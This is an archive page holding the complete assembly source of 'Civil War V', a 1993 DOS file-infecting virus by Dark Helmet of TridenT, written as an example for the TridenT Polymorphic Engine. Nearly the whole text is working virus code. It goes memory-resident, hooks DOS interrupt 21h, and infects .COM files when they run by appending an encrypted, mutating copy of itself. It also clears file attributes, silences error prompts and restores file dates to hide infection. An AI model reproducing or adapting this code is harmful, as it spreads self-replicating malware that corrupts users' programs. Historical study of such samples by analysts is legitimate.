home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / CIVIL510.ASM < prev    next >
Assembly Source File  |  1993-01-10  |  8KB  |  338 lines
  1. ;****************************************************************************
  2. ;   Civil War V V1.0                                                  *
  3. ;                                                                *
  4. ;   Assembled with Tasm 2.5                                            *
  5. ;   (c) Jan '93 [ Dark Helmet / TridenT ], The Netherlands                    *
  6. ;                                        *
  7. ;****************************************************************************
  8. ;                                        *
  9. ; This is an example virus for the TPE engine.                    *
  10. ; We are not responsible if you use the TPE in an illegal or naughty way.   *
  11. ; The TridenT Polymorpic Engine version 1.3 should be used for linking      *
  12. ; with this virus.                                       *
  13. ;                                        *
  14. ;****************************************************************************
  15.  
  16.         .model tiny
  17.         .radix    16
  18.         .code
  19.  
  20.         org    100h        
  21.  
  22.         extrn    rnd_init:near
  23.         extrn    rnd_get:near
  24.         extrn    crypt:near
  25.         extrn    tpe_top:near
  26.  
  27.  
  28. len           equ offset tpe_top - begin
  29.  
  30.  
  31. dummy:             db 0e9h, 03h, 00h, 44h, 48h, 00h       ; Jump + infection
  32.                                               ; marker
  33.  
  34. begin:             Call virus                            ; make call to
  35.                                                ; push IP on stack
  36.  
  37. virus:             pop      bp                          ; get IP from stack.
  38.               sub      bp,offset virus                    ; adjust IP.
  39.  
  40. restore_host:      mov      di,0100h                    ; recover beginning
  41.               lea      si,ds:[carrier_begin+bp]     ; of carrier program.
  42.               mov      cx,06h
  43.               rep      movsb
  44.  
  45. check_resident:    mov    ah,0a0h                     ; check if virus
  46.              int    21h                         ; already installed.
  47.              cmp    ax,0008h
  48.              je       end_virus
  49.  
  50. adjust_memory:     mov      ax,cs                          ; start of Memory
  51.               dec      ax                          ; Control Block
  52.               mov      ds,ax
  53.               cmp      byte ptr ds:[0000],5a          ; check if last
  54.                                                ; block
  55.               jne      abort                          ; if not last block
  56.                                                ; end
  57.               mov      ax,ds:[0003]                   ; decrease memory
  58.               sub      ax,200h                       ; by X kbyte lenght
  59.               mov      ds:[0003],ax
  60.         sub    word ptr ds:[0012],200h
  61.  
  62. install_virus:     call    RND_init
  63.  
  64.         mov      bx,ax                          ; es point to start
  65.               mov      ax,es                          ; virus in memory
  66.               add      ax,bx
  67.               mov      es,ax
  68.               
  69.         mov      cx,len                     ; cx = lenght virus
  70.               mov      ax,ds                          ; restore ds
  71.               inc      ax
  72.               mov      ds,ax
  73.               
  74.         lea      si,ds:[begin+bp]               ; point to start virus
  75.               lea      di,es:0100                     ; point to destination
  76.               rep      movsb                          ; copy virus in
  77.                                                ; memory
  78.               mov      [virus_segment+bp],es             ; store start virus
  79.                                                ; in memory
  80.               mov     ax,cs                         ; restore es
  81.               mov      es,ax
  82.  
  83. hook_vector:       cli                    ; no interups
  84.               mov      ax,3521h            ; revector int 21
  85.               int      21h
  86.         mov     ds,[virus_segment+bp]
  87.         mov      old_21h-6h,bx
  88.               mov      old_21h+2-6h,es
  89.  
  90.               mov      dx,offset main_virus - 6h
  91.               mov      ax,2521h
  92.               int      21h
  93.               sti
  94.  
  95. abort:             mov      ax,cs
  96.              mov      ds,ax
  97.               mov      es,ax
  98.  
  99. end_virus:         mov    bx,0100h            ; jump to begin
  100.         jmp    bx                ; host file
  101.  
  102.         
  103. ;*****************************************************************************
  104.  
  105. main_virus:        pushf                    
  106.         cmp    ah,0a0h                ; check virus call
  107.         jne    new_21h                ; no virus call
  108.         mov    ax,0008h            ; ax = id
  109.         popf                    ; return id    
  110.         iret
  111.         
  112. new_21h:    push    ds                ; save registers
  113.         push    es
  114.         push    di
  115.         push    si
  116.         push    ax
  117.         push    bx
  118.         push    cx
  119.         push    dx
  120.  
  121. check_exec:    cmp    ax,04b00h            ; exec function?
  122.         je    chk_com
  123.         
  124. continu:    pop    dx                ; restore registers
  125.         pop    cx
  126.         pop    bx
  127.         pop    ax
  128.         pop    si
  129.         pop    di
  130.         pop    es
  131.         pop    ds
  132.         popf
  133.         jmp    dword ptr cs:[old_21h-6]
  134.  
  135.  
  136. chk_com:    mov    cs:[name_seg-6],ds
  137.         mov    cs:[name_off-6],dx
  138.         cld                    ; check extension
  139.         mov    di,dx                ; for COM
  140.         push    ds
  141.         pop    es
  142.         mov    al,'.'                ; search extension
  143.         repne    scasb                ; check for 'COM"
  144.         cmp    word ptr es:[di],'OC'        ; check 'CO'
  145.         jne    continu
  146.         cmp    word ptr es:[di+2],'M'        ; check 'M'
  147.         jne    continu
  148.         
  149. own_stack:    cli
  150.         mov    cs:[old_sp-6],sp
  151.         mov    cs:[old_ss-6],ss
  152.         mov    ax,cs
  153.         add    ax,150h
  154.         mov    ss,ax
  155.         mov    sp,100h
  156.         sti
  157.     
  158.         call    set_int24h
  159.         call    set_atribuut
  160.                 
  161. open_file:    mov    ds,cs:[name_seg-6]
  162.         mov    dx,cs:[name_off-6]
  163.         mov    ax,3D02h            ; open file
  164.         call     do_int21h
  165.         jc    close_file
  166.  
  167.         mov    cs:[handle-6],ax
  168.         mov    bx,ax    
  169.  
  170.         call    get_date    
  171.         
  172. check_infect:    mov    bx,cs:[handle-6]        ; read first 6 bytes
  173.         mov    ah,3fh
  174.         mov    cx,06h
  175.         lea    dx,cs:[carrier_begin-6]
  176.         call    do_int21h
  177.         
  178.         push    cs
  179.         pop    ds
  180.         mov    al, byte ptr [carrier_begin-6]+3 ; check initials    
  181.         mov    ah, byte ptr [carrier_begin-6]+4 ; 'D' and 'H'
  182.         cmp    ax,cs:[initials-6]
  183.         je    save_date             ; if equal already
  184.                              ; infect
  185.         
  186. get_lenght:    mov    ax,4200h            ; file pointer begin
  187.         call    move_pointer
  188.         mov    ax,4202h            ; file pointer end
  189.         call    move_pointer
  190.         sub    ax,03h                ; ax = filelenght
  191.         mov    cs:[lenght_file-6],ax
  192.         
  193.         call    write_jmp
  194.         call    write_virus
  195.  
  196. save_date:    mov    bx,cs:[handle-6]
  197.         mov    dx,cs:[date-6]
  198.         mov    cx,cs:[time-6]
  199.         mov    ax,5701h
  200.         call    do_int21h
  201.  
  202.  
  203. close_file:    mov    bx,cs:[handle-6]
  204.         mov    ah,03eh                ; close file
  205.         call    do_int21h
  206.         
  207.         mov    dx,cs:[old_24h-6]        ; restore int24h
  208.         mov    ds,cs:[old_24h+2-6]
  209.         mov    ax,2524h
  210.         call    do_int21h
  211.         
  212.  
  213. restore_stack:    cli
  214.         mov    sp,cs:[old_sp-6]
  215.         mov    ss,cs:[old_ss-6]
  216.         sti
  217.         
  218.  
  219.                 jmp     continu
  220.  
  221.  
  222.  
  223. new_24h:    mov    al,03h
  224.         iret
  225.  
  226. ;---------------------------------------------------------------------------
  227. ;            PROCEDURES
  228. ;---------------------------------------------------------------------------
  229.  
  230. move_pointer:    push    cs
  231.         pop    ds
  232.         mov    bx,[handle-6]
  233.         xor    cx,cx
  234.         xor    dx,dx
  235.         call    do_int21h
  236.         ret
  237.  
  238. do_int21h:    pushf
  239.         call     dword ptr cs:[old_21h-6]
  240.         ret
  241.  
  242. write_jmp:    mov    ax,4200h            ; goto begin of file
  243.         call    move_pointer
  244.  
  245.         mov    ah,40h                ; write JMP instruction
  246.         mov    cx,01h
  247.         lea    dx,[jump-6]
  248.         call    do_int21h
  249.  
  250.         mov    ah,40h                ; write JMP offset
  251.         mov    cx,02h
  252.         lea    dx,[lenght_file-6]
  253.         call    do_int21h
  254.  
  255.         mov    ah,40h                ; write initials
  256.         mov    cx,02h
  257.                 lea     dx,[initials-6]
  258.         call    do_int21h
  259.         ret
  260.  
  261. write_virus:    mov    ax,4202h            ;goto end of file    
  262.         call    move_pointer
  263.  
  264. TPE_engine:    mov    ax,cs                ;ES points to 
  265.         add    ax,90h                ;worksegment
  266.         mov    es,ax
  267.  
  268.         push    cs                ;DS:DX code to encrypt
  269.         pop    ds
  270.         mov    dx,100h
  271.  
  272.         mov    bp,[lenght_file-6]         ;BP start of encryptor
  273.         add    bp,103h
  274.         
  275.                 mov     cx,len                ;lenght code to encrypt
  276.  
  277.         xor    si,si                ;distance encryptor/
  278.                             ;decryptor = 0
  279.  
  280.                 call    rnd_get                 ;AX = type of 
  281.          call    crypt                ;encryption
  282.  
  283.                 mov     bx,cs:[handle-6]        ;write virus
  284.                 mov     ah,40h                ;at end of file
  285.         call    do_int21h
  286.                 ret
  287.  
  288. get_date:    mov    ax,5700h
  289.         call    do_int21h
  290.         push    cs
  291.         pop    ds
  292.         mov    [date-6],dx
  293.         mov    [time-6],cx
  294.         ret
  295.  
  296. set_int24h:    mov    ax,3524h            ; hook int 24h
  297.         call    do_int21h
  298.         mov    cs:[old_24h-6],bx
  299.         mov    cs:[old_24h+2-6],es
  300.         mov    dx,offset new_24h-6
  301.         push    cs
  302.         pop    ds
  303.         mov    ax,2524h
  304.         call    do_int21h
  305.         ret
  306.  
  307. set_atribuut:    mov    ax,4300h            ; get atribuut
  308.         mov    ds,cs:[name_seg-6]
  309.         mov    dx,cs:[name_off-6]
  310.         call    do_int21h
  311.         and    cl,0feh                ; set atribuut
  312.         mov    ax,4301h
  313.         call    do_int21h        
  314.         ret
  315.  
  316. ;---------------------------------------------------------------------------
  317. ;                DATA
  318. ;---------------------------------------------------------------------------
  319.  
  320. virus_name    db  "Civil War V v1.0, (c) Jan '92"
  321. old_21h            dw  00h,00h
  322. old_24h        dw  00h,00h
  323. old_ss        dw  ?    
  324. old_sp        dw  ?
  325. carrier_begin      db  090h, 0cdh, 020h, 044h, 048h, 00h
  326. jump        db  0e9h
  327. name_seg    dw  ?
  328. name_off    dw  ?
  329. virus_segment      dw  ?
  330. lenght_file    dw  ?
  331. handle        dw  ?
  332. date        dw  ?
  333. time        dw  ?
  334. initials    dw  4844h
  335. writer        db  "[ DH / TridenT ]"
  336.  
  337.               end dummy
  338.